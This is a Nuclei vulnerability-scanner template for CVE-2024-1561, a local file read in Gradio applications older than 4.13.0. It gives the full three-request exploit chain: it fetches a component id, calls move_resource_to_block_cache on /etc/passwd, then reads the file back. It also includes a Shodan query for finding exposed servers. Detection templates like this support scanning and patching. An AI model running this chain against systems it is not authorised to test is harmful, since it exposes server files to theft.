nuclei-templates/http/cves/2024/CVE-2024-1561.yaml

id: CVE-2024-1561

info:
  name: Gradio Applications - Local File Read
  author: Diablo
  severity: high
  description: |
    Local file read by calling arbitrary methods of Components class    
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read files on the server    
  remediation: |
    Update to Gradio 4.13.0    
  reference:
    - https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338
    - https://github.com/DiabloHTB/CVE-2024-1561
    - https://nvd.nist.gov/vuln/detail/CVE-2024-1561
    - https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2
    - https://www.gradio.app/changelog#4-13-0
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-1561
    cwe-id: CWE-29
    epss-score: 0.00087
    epss-percentile: 0.36659
  metadata:
    verified: true
    max-request: 3
    shodan-query: html:"__gradio_mode__"
  tags: cve,cve2024,intrusive,unauth,gradio,lfi,lfr
flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        GET /config HTTP/1.1
        Host: {{Hostname}}        

    extractors:
      - type: json
        name: first-component
        part: body
        group: 1
        json:
          - '.components[0].id'
        internal: true

  - raw:
      - |
        POST /component_server HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"component_id": "{{first-component}}","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}        

    extractors:
      - type: regex
        name: tmpath
        regex:
          - \/[a-zA-Z0-9\/]+
        internal: true

  - raw:
      - |
        GET /file={{tmpath}} HTTP/1.1
        Host: {{Hostname}}        

    matchers:
      - type: dsl
        dsl:
          - regex('root:.*:0:0:', body)
          - 'contains(header, "text/plain")'
        condition: and
# digest: 490a004630440220228b8f9ed4c8b48faa786cd1c48413831ef219341e029831e13f0a25f92be8a902204ff8d692224fa018c063b78b72507ddf2e92f2a750fd3b5cd0c01bc2f32a762f:922c64590222798bb761d5b6d8e72950